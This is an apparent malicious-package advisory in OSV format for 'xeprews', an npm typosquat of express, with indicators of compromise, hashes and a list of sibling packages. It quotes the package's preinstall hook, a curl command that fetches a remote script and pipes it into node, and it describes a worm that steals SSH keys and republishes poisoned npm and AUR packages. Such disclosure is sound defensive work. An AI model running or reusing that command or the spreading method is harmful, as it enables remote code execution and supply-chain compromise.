mal-2026-17248
Vulnerability from ossf_malicious_packages
The package xeprews impersonates the legitimate 'express' package (it republishes express's package metadata and code) and adds a malicious preinstall hook that runs automatically on npm install, before any dependency is installed: curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node. The hook downloads a remote JavaScript second stage from a Wayback Machine mirror of a Codeberg repository (hellscripter/install-scripts) and pipes it directly into node, giving the attacker arbitrary code execution on the installing machine. Version 5.2.1 was published on 2026-09-29. It is one of nine packages published within about 33 minutes by the npm account 'dirtyblanket' (maintainer email s7dwzxru4z@ooynib.com), all carrying the identical preinstall hook: xeprews, express-javascript, express-nodejs, react-nodejs, exprdd, exprrdd, exptrdd, exptred, exptredd.
On Linux, node.js pipes linux.sh from the same Codeberg repository into bash. linux.sh (SHA-256 65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577) is a worm. It installs a Go binary, systemd-fontd, as a systemd service named "Font Rendering Service" that proxies through Tor. SafeDep has not yet analyzed that binary. The script collects SSH private keys and known_hosts files, then connects to the known hosts over SSH and runs linux.sh on them. With the same keys, it pushes a linux.sh loader into the .install file of Arch User Repository (AUR) packages that the key owner maintains. For each package.json on disk, it adds the same preinstall script, runs npm version patch, and runs npm publish with each .npmrc it finds.
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (17facf9b3612b1338fbda61069db829317150a9e7dbcc38cf96abbee1baa29b2)
xeprews is an Express typosquat whose package.json declares a preinstall lifecycle hook that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching a JavaScript file from a third-party mutable branch (no commit pin, no integrity check) and executing it under Node on the installer's machine at npm install time. The package impersonates expressjs/express by copying its author, repository, homepage, and description metadata, and ships only a stub index.js that re-exports './lib/express'; the impersonation is the lure that induces the install and thereby the remote code execution. Whoever controls the codeberg branch (or the archive.org replay of it) controls arbitrary code execution on every installer.
- CWE-506 - The product contains code that appears to be malicious in nature.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "package.json",
"sha256": "4c2a000aa786ae63605c3b66e8e3366d91f3220c8bcce7915ad438be535f24ca",
"tlsh": "6951da21cc0e8c6326c5a2dd3c68a542616188078e41f81cf769539c8f8e56f71b9fbf"
}
],
"package_integrity": [
{
"filename": "xeprews-5.2.1.tgz",
"hashes": {
"sha1": "3278b86e26ecbe57a6a5a5216b8ed4655d4b21dd",
"sha512_sri": "sha512-LvmzJ/7aoujfXcp+LCjYs+DCani42ox+4gyaGrd0I2BLACD630Jx8mbgypRzIQB0UICgwGMdlyg0ENLqTwUXbw=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "xeprews"
},
"versions": [
"5.2.1"
]
}
],
"credits": [
{
"contact": [
"inspector-research@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
},
{
"name": "Pranesh, InvisiRisk",
"type": "FINDER"
},
{
"contact": [
"https://safedep.io"
],
"name": "SafeDep",
"type": "FINDER"
}
],
"database_specific": {
"iocs": {
"files": [
{
"note": "preinstall script pipes the web.archive.org copy of node.js into node.",
"paths": [
"package.json"
],
"source": "PACKAGE_ARCHIVE"
},
{
"digests": {
"sha256": "65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577"
},
"note": "Stage two Bash worm, piped from curl into bash.",
"paths": [
"linux.sh"
],
"source": "IN_MEMORY"
},
{
"digests": {
"sha256": "2c9dbc14809f1e1aebda114194368b002acf74c8760b88fc101f625d179793c2"
},
"note": "systemd-fontd, a stripped Go ELF x86-64 binary run as the \"Font Rendering Service\" systemd service. First path as root, second path without root.",
"paths": [
"/usr/lib/systemd/systemd-fontrenderd",
"~/.config/systemd/systemd-fontcached"
],
"source": "DROPPED"
}
],
"urls": [
"https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js",
"https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js",
"https://codeberg.org/hellscripter/install-scripts/raw/branch/main/linux.sh",
"https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/systemd-fontd"
]
},
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020630",
"import_time": "2026-09-29T14:44:37.282975363Z",
"modified_time": "2026-09-29T14:40:06Z",
"sha256": "17facf9b3612b1338fbda61069db829317150a9e7dbcc38cf96abbee1baa29b2",
"source": "amazon-inspector",
"versions": [
"5.2.1"
]
}
]
},
"details": "The package xeprews impersonates the legitimate \u0027express\u0027 package (it republishes express\u0027s package metadata and code) and adds a malicious preinstall hook that runs automatically on npm install, before any dependency is installed: `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`. The hook downloads a remote JavaScript second stage from a Wayback Machine mirror of a Codeberg repository (hellscripter/install-scripts) and pipes it directly into node, giving the attacker arbitrary code execution on the installing machine. Version 5.2.1 was published on 2026-09-29. It is one of nine packages published within about 33 minutes by the npm account \u0027dirtyblanket\u0027 (maintainer email s7dwzxru4z@ooynib.com), all carrying the identical preinstall hook: xeprews, express-javascript, express-nodejs, react-nodejs, exprdd, exprrdd, exptrdd, exptred, exptredd.\n\nOn Linux, node.js pipes linux.sh from the same Codeberg repository into bash. linux.sh (SHA-256 65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577) is a worm. It installs a Go binary, systemd-fontd, as a systemd service named \"Font Rendering Service\" that proxies through Tor. SafeDep has not yet analyzed that binary. The script collects SSH private keys and known_hosts files, then connects to the known hosts over SSH and runs linux.sh on them. With the same keys, it pushes a linux.sh loader into the .install file of Arch User Repository (AUR) packages that the key owner maintains. For each package.json on disk, it adds the same preinstall script, runs npm version patch, and runs npm publish with each .npmrc it finds.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (17facf9b3612b1338fbda61069db829317150a9e7dbcc38cf96abbee1baa29b2)\nxeprews is an Express typosquat whose package.json declares a preinstall lifecycle hook that runs `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`, fetching a JavaScript file from a third-party mutable branch (no commit pin, no integrity check) and executing it under Node on the installer\u0027s machine at `npm install` time. The package impersonates expressjs/express by copying its author, repository, homepage, and description metadata, and ships only a stub index.js that re-exports \u0027./lib/express\u0027; the impersonation is the lure that induces the install and thereby the remote code execution. Whoever controls the codeberg branch (or the archive.org replay of it) controls arbitrary code execution on every installer.\n",
"id": "MAL-2026-17248",
"modified": "2026-10-01T08:00:00Z",
"published": "2026-09-29T07:12:49Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/xeprews/v/5.2.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/xeprews"
},
{
"type": "REPORT",
"url": "https://safedep.io/dirtyblanket-express-impersonation-npm/"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in xeprews (npm)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
The approach is described in our paper Mapping CVEs to MITRE ATT&CK Techniques: A Curated Gold-Set Classifier and the Limits of LLM-Assisted Label Expansion.
Browse all ATT&CK techniques and the vulnerabilities related to each.
Related by attack behaviour
Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.